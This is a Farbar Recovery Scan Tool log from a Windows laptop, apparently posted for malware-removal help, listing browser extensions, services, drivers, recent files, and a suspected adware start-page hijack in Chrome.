FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3283718265-1983809055-1317204610-1001: intel.com/AppUp -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp.dll [2013-07-18] (Intel)
FF Plugin HKU\S-1-5-21-3283718265-1983809055-1317204610-1001: intel.com/AppUpx64 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll [2013-07-18] (Intel)
FF Extension: Video DownloadHelper - C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-01-02]
FF Extension: Adblock Plus - C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-01-02]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2017-01-22]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/ig
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggQcVwABFtEGBhAcgEITA1AQwwOeA4OBRRDRQxCJgBcVlhBRAwFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEgVFxAK3JWDk4="
CHR Profile: C:\Users\007\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-07]
CHR Extension: (Google Docs) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-07]
CHR Extension: (Google Drive) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-07]
CHR Extension: (YouTube) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-07]
CHR Extension: (Google Cast) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2015-11-10]
CHR Extension: (Adblock Plus) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-11-07]
CHR Extension: (Pushbullet) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\chlffgpmiacpedhhbkiomidkjlcfhogd [2015-11-07]
CHR Extension: (Videostream for Google Chromecast™) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnciopoikihiagdjbjpnocolokfelagl [2015-11-07]
CHR Extension: (Google Search) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-07]
CHR Extension: (Google Calendar) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-11-07]
CHR Extension: (Google Sheets) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-07]
CHR Extension: (Google Docs Offline) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-07]
CHR Extension: (AdBlock) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-11-07]
CHR Extension: (TinEye Reverse Image Search) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\haebnnbpedcbhciplfhjjkbafijpncjl [2015-11-07]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-01-22]
CHR Extension: (IE Tab) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hehijbfgiekmjfkfjpbkbammjbdenadd [2015-11-07]
CHR Extension: (feedly) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipbfijinpcgfogaopmgehiegacbhmob [2016-06-13]
CHR Extension: (goo.gl URL Shortener) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\iblijlcdoidgdpfknkckljiocdbnlagk [2015-11-07]
CHR Extension: (Google Play Music) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\icppfcnhkcmnfdhfhphakoifcfokfdhg [2015-11-07]
CHR Extension: (Google Maps) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-11-07]
CHR Extension: (RSS Subscription Extension (by Google)) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbjncdgjeocebhnmkbbbdekmmmcbfjd [2015-11-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-07]
CHR Extension: (Remote Torrent Adder) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\oabphaconndgibllomdcjbfdghcmenci [2015-11-07]
CHR Extension: (Gmail) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-07]
CHR Extension: (Chrome Media Router) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-08-02]
CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [433688 2016-01-07] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [413208 2016-01-07] (BlueStack Systems, Inc.)
S3 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [859672 2016-01-07] (BlueStack Systems, Inc.)
S2 CDPUserSvc; C:\Windows\System32\CDPUserSvc.dll [339456 2016-11-11] (Microsoft Corporation)
R2 CDPUserSvc_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 CDPUserSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [3042032 2017-01-17] (Microsoft Corporation)
S4 DACoreService; C:\Program Files (x86)\Nuance\Dragon Assistant\Core\DACore.exe [432528 2013-05-02] (Nuance Communications, Inc.)
R2 DptfParticipantProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [115632 2013-08-02] (Intel Corporation)
R2 DptfPolicyConfigTDPService; C:\Windows\system32\DptfPolicyConfigTDPService.exe [116656 2013-08-02] (Intel Corporation)
R2 DptfPolicyCriticalService; C:\Windows\system32\DptfPolicyCriticalService.exe [148688 2013-08-02] (Intel Corporation)
R2 DptfPolicyLpmService; C:\Windows\system32\DptfPolicyLpmService.exe [124880 2013-08-02] (Intel Corporation)
S3 FrameServer; C:\Windows\system32\FrameServer.dll [805888 2016-11-02] (Microsoft Corporation)
S3 HvHost; C:\Windows\System32\hvhostsvc.dll [67584 2016-07-16] (Microsoft Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [373744 2016-11-01] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel(R) Corporation)
R2 Intel(R) Wireless Bluetooth(R) 4.0 Radio Management; C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe [155448 2013-09-20] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-08-08] (Intel Corporation)
R2 LsvUIService; C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvUIService.exe [70416 2013-10-26] (Lenovo)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MessagingService; C:\Windows\System32\MessagingService.dll [52224 2016-07-16] (Microsoft Corporation)
S3 MessagingService_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
S3 MessagingService_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2014-04-08] (Motorola Mobility LLC)
R2 NitroDriverReadSpool8; C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe [230408 2013-06-28] (Nitro PDF Software)
R2 OneSyncSvc_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 OneSyncSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 PGService; C:\Program Files (x86)\Lenovo\Motion Control\PGService.exe [162600 2013-08-29] (PointGrab LTD)
R2 PhoneCompanionPusher; C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionPusher.exe [249872 2013-10-26] (Lenovo)
S3 PhoneCompanionVap; C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionVap.exe [328720 2013-10-26] (Lenovo)
R3 PimIndexMaintenanceSvc_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 PimIndexMaintenanceSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [390632 2012-04-24] ()
S3 RmSvc; C:\Windows\System32\RMapi.dll [140800 2016-09-15] (Microsoft Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [288472 2013-09-13] (Realtek Semiconductor)
S4 shpamsvc; C:\Windows\system32\Windows.SharedPC.AccountManager.dll [161792 2016-07-16] (Microsoft Corporation)
R2 SoftshieldService; C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe [67848 2016-11-02] (Hewlett-Packard)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [249032 2015-06-03] (Synaptics Incorporated)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6942480 2016-03-02] (TeamViewer GmbH)
S3 TieringEngineService; C:\Windows\system32\TieringEngineService.exe [287744 2016-07-16] (Microsoft Corporation)
R3 TimeBrokerSvc; C:\Windows\System32\TimeBrokerServer.dll [177664 2016-07-16] (Microsoft Corporation)
S4 tzautoupdate; C:\Windows\system32\tzautoupdate.dll [95232 2016-09-24] (Microsoft Corporation)
R3 UnistoreSvc_571b2; C:\WINDOWS\System32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 UnistoreSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R3 UserDataSvc_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 UserDataSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
S3 vmicrdv; C:\Windows\System32\icsvcext.dll [349696 2016-09-15] (Microsoft Corporation)
S3 vmicvss; C:\Windows\System32\icsvcext.dll [349696 2016-09-15] (Microsoft Corporation)
S4 VPNUnlimitedService; C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe [61808 2015-09-23] (KeepSolid Inc.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S3 wisvc; C:\Windows\system32\flightsettings.dll [635904 2016-11-02] (Microsoft Corporation)
S3 WpnUserService; C:\Windows\System32\WpnUserService.dll [74240 2016-07-16] (Microsoft Corporation)
S3 WpnUserService_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
S3 WpnUserService_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 ymc; C:\ProgramData\LenovoTransition\Server\x64\ymc.exe [32016 2013-10-26] (Lenovo)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AcpiDev; C:\Windows\System32\drivers\AcpiDev.sys [18432 2016-07-16] (Microsoft Corporation)
S3 applockerfltr; C:\Windows\System32\drivers\applockerfltr.sys [15360 2016-07-16] (Microsoft Corporation)
S0 b06bdrv; C:\Windows\System32\drivers\bxvbda.sys [533856 2016-07-16] (QLogic Corporation)
S3 bcmfn; C:\Windows\System32\drivers\bcmfn.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider)
S2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [154680 2016-01-07] (BlueStack Systems)
R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [168448 2016-09-15] (Microsoft Corporation)
R3 BthHFAud; C:\Windows\System32\drivers\BthHfAud.sys [37376 2016-07-16] (Microsoft Corporation)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [249856 2016-09-15] (Microsoft Corporation)
S3 cht4iscsi; C:\Windows\System32\drivers\cht4sx64.sys [346976 2016-07-16] (Chelsio Communications)
S3 cht4vbd; C:\Windows\System32\drivers\cht4vx64.sys [2104160 2016-07-16] (Chelsio Communications)
R2 clreg; C:\Windows\System32\drivers\registry.sys [70144 2016-07-16] (Microsoft Corporation)
R3 DptfDevPch; C:\Windows\system32\DRIVERS\DptfDevPch.sys [114680 2013-08-02] (Intel Corporation)
R3 DptfDevProc; C:\Windows\system32\DRIVERS\DptfDevProc.sys [287160 2013-08-02] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [494272 2013-08-02] (Intel Corporation)
S3 hvservice; C:\Windows\System32\drivers\hvservice.sys [73568 2016-09-24] (Microsoft Corporation)
S3 iagpio; C:\Windows\System32\drivers\iagpio.sys [33280 2016-07-16] (Intel(R) Corporation)
S3 iai2c; C:\Windows\System32\drivers\iai2c.sys [81408 2016-07-16] (Intel(R) Corporation)
S3 iaLPSS2i_GPIO2; C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys [64512 2016-07-16] (Intel Corporation)
S3 iaLPSS2i_I2C; C:\Windows\System32\drivers\iaLPSS2i_I2C.sys [176384 2016-07-16] (Intel Corporation)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [231168 2017-01-13] (Intel Corporation)
R3 ikbevent; C:\Windows\system32\DRIVERS\ikbevent.sys [21408 2013-08-01] ()
R3 imsevent; C:\Windows\system32\DRIVERS\imsevent.sys [21920 2013-08-01] ()
S3 IndirectKmd; C:\Windows\System32\drivers\IndirectKmd.sys [35840 2016-07-16] (Microsoft Corporation)
R0 iorate; C:\Windows\System32\drivers\iorate.sys [48992 2016-11-02] (Microsoft Corporation)
R3 ISCT; C:\Windows\System32\drivers\ISCTD64.sys [46568 2013-08-01] ()
S0 megasas2i; C:\Windows\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-12-20] (Intel Corporation)
S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 NETwNb64; C:\Windows\System32\drivers\Netwbw02.sys [3485696 2016-07-16] (Intel Corporation)
S0 percsas2i; C:\Windows\System32\drivers\percsas2i.sys [58720 2016-07-16] (Avago Technologies)
R3 rtsuvc; C:\Windows\system32\DRIVERS\rtsuvc.sys [8247640 2013-07-19] (Realtek Semiconductor Corp.)
S0 scmbus; C:\Windows\System32\drivers\scmbus.sys [88416 2016-07-16] (Microsoft Corporation)
S3 scmdisk0101; C:\Windows\System32\drivers\scmdisk0101.sys [123904 2016-07-16] (Microsoft Corporation)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-03] (Synaptics Incorporated)
S3 UcmTcpciCx0101; C:\Windows\System32\Drivers\UcmTcpciCx.sys [108544 2016-07-16] (Microsoft Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [45568 2016-07-16] (Microsoft Corporation)
S3 vmgid; C:\Windows\System32\drivers\vmgid.sys [10240 2016-07-16] (Microsoft Corporation)
R0 volume; C:\Windows\System32\drivers\volume.sys [16224 2016-07-16] (Microsoft Corporation)
R2 wcifs; C:\Windows\system32\drivers\wcifs.sys [119648 2016-09-15] (Microsoft Corporation)
R2 wcnfs; C:\Windows\system32\drivers\wcnfs.sys [66560 2016-07-16] (Microsoft Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S3 wsvd; C:\Windows\system32\DRIVERS\wsvd.sys [102376 2012-06-13] ("CyberLink)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: shpamsvc -> C:\Windows\system32\Windows.SharedPC.AccountManager.dll (Microsoft Corporation)
NETSVC: WpnService -> C:\Windows\system32\WpnService.dll (Microsoft Corporation)
NETSVC: wisvc -> C:\Windows\system32\flightsettings.dll (Microsoft Corporation)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-03-03 21:12 - 2017-03-03 21:12 - 00000797 _____ C:\Users\007\Desktop\JRT.txt
2017-03-03 20:23 - 2017-03-03 20:23 - 00000000 __RHD C:\MSOCache
2017-03-03 20:06 - 2017-03-03 20:06 - 00006462 _____ C:\Users\007\Desktop\malwarebytes 3.3.17 report.txt
2017-03-03 20:01 - 2017-03-03 20:57 - 00186304 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-03-03 20:01 - 2017-03-03 20:57 - 00111544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-03-03 20:01 - 2017-03-03 20:57 - 00092088 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-03-03 20:01 - 2017-03-03 20:01 - 00001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-03-03 20:01 - 2017-03-03 20:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-03-03 20:01 - 2017-03-03 20:01 - 00000000 ____D C:\Program Files\Malwarebytes
2017-03-03 20:01 - 2017-02-24 06:23 - 00077408 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-03-03 19:28 - 2017-03-03 21:09 - 01663736 _____ (Malwarebytes) C:\Users\007\Desktop\JRT.exe
2017-03-03 19:28 - 2017-03-03 19:28 - 01663736 _____ (Malwarebytes) C:\Users\007\Downloads\JRT.exe
2017-03-03 19:27 - 2017-03-03 20:28 - 04031440 _____ C:\Users\007\Desktop\AdwCleaner.exe
2017-03-03 19:26 - 2017-03-03 20:00 - 57131432 _____ (Malwarebytes ) C:\Users\007\Desktop\mb3-setup-consumer-3.0.6.1469-1075.exe
2017-03-03 19:24 - 2017-03-03 19:24 - 00205169 _____ C:\Users\007\Desktop\I believe I have malware on my computer. - TechSpot Forums.html
2017-03-03 19:24 - 2017-03-03 19:24 - 00000000 ____D C:\Users\007\Desktop\I believe I have malware on my computer. - TechSpot Forums_files
2017-03-03 19:18 - 2017-03-03 19:18 - 00026506 _____ C:\Users\007\Desktop\a.txt
2017-03-03 19:17 - 2017-03-03 19:17 - 00026508 _____ C:\Users\007\Desktop\rk_325A.tmp.txt
2017-03-03 19:16 - 2017-03-03 19:16 - 00003968 _____ C:\WINDOWS\System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF}
2017-03-03 18:50 - 2017-03-03 18:50 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-03-03 18:50 - 2017-03-03 18:50 - 00000870 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2017-03-03 18:49 - 2017-03-03 19:19 - 00000000 ____D C:\ProgramData\RogueKiller
2017-03-03 18:49 - 2017-03-03 18:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2017-03-03 18:49 - 2017-03-03 18:50 - 00000000 ____D C:\Program Files\RogueKiller
2017-03-03 18:47 - 2017-03-03 18:48 - 34885984 _____ (Adlice Software ) C:\Users\007\Desktop\setup.exe
2017-03-03 16:49 - 2017-03-03 16:49 - 00000000 ____D C:\WINDOWS\Panther
2017-03-02 21:29 - 2017-03-02 21:29 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-03-01 14:20 - 2017-03-01 14:20 - 00000336 _____ C:\Users\007\Desktop\SHIVANG.txt
2017-03-01 14:18 - 2017-03-01 14:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KeyFinder
2017-03-01 14:18 - 2017-03-01 14:18 - 00000000 ____D C:\Program Files (x86)\Magical Jelly Bean
2017-03-01 14:16 - 2017-03-01 14:16 - 00321324 _____ C:\WINDOWS\Minidump\030117-8218-01.dmp
2017-02-27 14:59 - 2017-03-03 20:07 - 00008976 _____ C:\WINDOWS\PFRO.log
2017-02-26 08:58 - 2017-02-26 08:58 - 00086646 _____ C:\Users\007\Downloads\Formula1.2016.Round21.Abu_Dhabi.Race.Build-Up.SkySportsF1.720p.H265.English.torrent
2017-02-26 07:23 - 2017-02-26 07:23 - 08176017 _____ C:\Users\007\Downloads\InfectionControl2015.zip
2017-02-26 07:23 - 2017-02-26 07:23 - 02352528 _____ C:\Users\007\Downloads\Rotator-and-Student-Orientation.zip
2017-02-24 06:11 - 2017-02-24 06:11 - 01072128 _____ C:\Users\007\Downloads\checklist-2-armed-rct_default.ppt
2017-02-21 20:15 - 2017-02-26 07:26 - 00000000 ____D C:\Users\007\Desktop\HAV lecture
2017-02-19 21:58 - 2017-02-19 22:12 - 00000000 ____D C:\Users\007\Desktop\AIMCC
2017-02-07 22:53 - 2017-02-07 22:53 - 00000000 ____D C:\Users\007\Desktop\radio
2017-02-07 22:53 - 2017-02-07 22:53 - 00000000 ____D C:\Users\007\Desktop\radio
2017-02-02 20:08 - 2017-03-02 21:29 - 00003452 _____ C:\WINDOWS\setupact.log
2017-02-02 20:08 - 2017-03-02 21:29 - 00000464 _____ C:\WINDOWS\setuperr.log

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-03-03 21:55 - 2017-01-22 19:44 - 00035098 _____ C:\Users\007\Desktop\FRST.txt
2017-03-03 21:55 - 2017-01-22 19:44 - 00000000 ____D C:\FRST
2017-03-03 21:45 - 2017-01-27 19:11 - 00000275 _____ C:\WINDOWS\WindowsUpdate.log
2017-03-03 21:32 - 2016-09-23 22:02 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-03-03 21:32 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\system32\sru
2017-03-03 21:01 - 2016-07-29 22:30 - 04711534 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-03-03 21:00 - 2017-01-23 19:29 - 00000000 ____D C:\AdwCleaner
2017-03-03 20:57 - 2016-09-23 22:16 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-03-03 20:57 - 2016-09-23 22:03 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-03-03 20:57 - 2016-08-07 10:18 - 00251840 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-03 20:57 - 2016-08-07 10:18 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-03-03 20:57 - 2016-02-06 00:11 - 00000000 ____D C:\Temp
2017-03-03 20:56 - 2016-07-16 00:04 - 01048576 _____ C:\WINDOWS\system32\config\BBI
2017-03-03 20:35 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-03-03 20:16 - 2016-12-12 13:37 - 00003270 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-03-03 20:08 - 2016-09-23 22:06 - 00000000 ____D C:\Users\007
2017-03-03 20:08 - 2016-01-03 18:52 - 00000258 __RSH C:\ProgramData\ntuser.pol
2017-03-03 20:05 - 2015-11-08 02:11 - 00000000 ____D C:\Users\007\AppData\Roaming\vlc
2017-03-03 20:01 - 2016-08-07 10:18 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-03-03 19:16 - 2016-09-23 22:16 - 00003878 _____ C:\WINDOWS\System32\Tasks\{1C4B8B9E-DE5F-6DE8-65E2-49D96144215A}
2017-03-03 19:11 - 2013-08-22 09:36 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2017-03-03 18:30 - 2016-11-28 15:49 - 00004148 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{88938F53-F35B-46C3-83EF-574C9ECB74F2}
2017-03-03 16:53 - 2017-01-22 19:44 - 00054732 _____ C:\Users\007\Desktop\Addition.txt
2017-03-01 14:36 - 2015-11-07 23:14 - 00000000 ____D C:\Program Files\Microsoft Office 15
2017-03-01 14:16 - 2016-10-07 07:11 - 00000000 ____D C:\WINDOWS\Minidump
2017-02-27 19:16 - 2017-01-23 19:21 - 00000000 ____D C:\ProgramData\{75B3123D-C218-A596-FE55-6B3AE26A02BB}
2017-02-27 19:16 - 2017-01-23 19:16 - 00000000 ____D C:\ProgramData\{33B94F1E-8412-F8B5-202E-AD1CD3E2D668}
2017-02-27 14:58 - 2016-02-01 10:34 - 00000000 ____D C:\Users\007\AppData\Roaming\Rsupport
2017-02-27 14:56 - 2017-01-29 10:15 - 00000000 ____D C:\Program Files (x86)\NirSoft
2017-02-27 14:54 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-02-27 14:54 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-02-26 09:08 - 2015-11-07 19:56 - 00000000 ____D C:\Users\007\AppData\Local\Packages
2017-02-23 18:20 - 2015-12-14 00:21 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-23 00:27 - 2015-11-08 00:08 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-02-23 00:23 - 2015-11-08 00:08 - 138020592 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-02-22 23:59 - 2016-07-29 22:50 - 00002372 _____ C:\Users\007\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-22 23:59 - 2016-07-29 22:50 - 00000000 ___RD C:\Users\007\OneDrive
2017-02-21 18:48 - 2016-07-16 05:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-02-19 15:09 - 2016-01-02 19:22 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-06 13:48 - 2016-07-16 05:49 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-02-06 13:48 - 2016-07-16 05:49 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-02-02 19:58 - 2017-01-22 19:55 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-02-02 19:58 - 2017-01-22 19:55 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk

==================== Files in the root of some directories =======

2015-11-07 22:31 - 2015-11-07 22:31 - 20320792 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe
2015-11-07 19:57 - 2015-11-10 22:55 - 0012093 _____ () C:\Users\007\AppData\Roaming\AbsoluteReminder.xml
